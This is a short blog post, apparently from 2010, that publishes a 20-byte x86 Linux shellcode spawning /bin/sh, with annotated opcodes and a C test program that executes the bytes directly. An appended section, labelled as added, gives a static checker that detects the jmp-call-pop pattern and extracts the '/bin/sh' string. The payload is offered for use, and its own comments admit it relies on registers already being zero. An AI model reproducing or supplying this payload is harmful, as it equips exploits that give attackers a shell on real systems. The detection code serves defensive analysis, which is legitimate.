20 Bytes “/bin/sh” Shellcode

Finally… my first shellcode… ?

/*
Name : 20 bytes "/bin/sh" shellcode - execve(/bin/sh,..,..)
Info : this shell works without first zeroing the registers it uses (eax,ebx,ecx)
Author : otoy
Blog : http://otoyrood.wordpress.com
Date : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/

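#include <stdio.h>
#include <string.h> /* strlen */

char shellcode[] =
"\xeb\x06" /* jmp 8048068 (forward to the call) */
"\x5b" /* pop %ebx (ebx = address of "/bin/sh") */
"\x8d\x41\x0b" /* lea 0xb(%ecx),%eax (eax = ecx + 11; 11 is execve only if ecx is 0 on entry) */
"\xcd\x80" /* int $0x80 */
"\xe8\xf5\xff\xff\xff" /* call 8048062 (pushes the address of the next byte) */
/* The remaining bytes are the string "/bin/sh"; a disassembler shows them as das / bound / das / jae. */
"\x2f" /* '/' */
"\x62\x69\x6e" /* "bin" */
"\x2f" /* '/' */
"\x73\x68"; /* "sh" */

int main(void)
{
    fprintf(stdout, "[*] Shellcode length: %zu\n", strlen(shellcode));
    ((void (*)(void)) shellcode)();

    return 0;
}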
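
Added example (not part of the original post, not the author's code): a small static check that recognises the jmp-call-pop layout used above and recovers the data that follows the call, which is why a disassembler mislabels the "/bin/sh" bytes as instructions. The function names find_jmp_call_pop and printable_run are hypothetical, and the sample buffer is constructed from the 20 bytes in the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the 20 bytes from the listing above. */
static const uint8_t sample[] = {
    0xeb, 0x06, 0x5b, 0x8d, 0x41, 0x0b, 0xcd, 0x80, 0xe8, 0xf5,
    0xff, 0xff, 0xff, '/', 'b', 'i', 'n', '/', 's', 'h'
};

/* Scan for a jmp-call-pop stub: short forward jmp (EB rel8) to a near call
 * (E8 rel32) that returns to a pop r32 (58..5F) between the jmp and the call.
 * Returns the offset of the bytes following the call (the data whose
 * address the call pushes), or -1 if no stub is found. */
long find_jmp_call_pop(const uint8_t *buf, size_t len, size_t *pop_off)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] != 0xeb || (buf[i + 1] & 0x80))
            continue;                         /* not a forward short jmp */
        size_t call = i + 2 + buf[i + 1];     /* jmp destination */
        if (call + 5 > len || buf[call] != 0xe8)
            continue;                         /* no near call there */
        uint32_t u = buf[call + 1] | (uint32_t)buf[call + 2] << 8 |
                     (uint32_t)buf[call + 3] << 16 | (uint32_t)buf[call + 4] << 24;
        long target = (long)(call + 5) + (int32_t)u;   /* call destination */
        if (target < (long)(i + 2) || target >= (long)call ||
            (buf[target] & 0xf8) != 0x58)
            continue;                         /* must land on pop r32 */
        *pop_off = (size_t)target;
        return (long)(call + 5);
    }
    return -1;
}

/* Copy the printable ASCII run starting at off into out (NUL-terminated). */
size_t printable_run(const uint8_t *buf, size_t len, size_t off, char *out, size_t cap)
{
    size_t n = 0;
    for (; off + n < len && n + 1 < cap && buf[off + n] >= 0x20 && buf[off + n] < 0x7f; n++)
        out[n] = (char)buf[off + n];
    out[n] = '\0';
    return n;
}

int main(void)
{
    size_t pop = 0; char s[32];
    long data = find_jmp_call_pop(sample, sizeof sample, &pop);
    if (data >= 0 && printable_run(sample, sizeof sample, (size_t)data, s, sizeof s))
        printf("stub: pop at +%zu, data at +%ld: \"%s\"\n", pop, data, s);
    return 0;
}
```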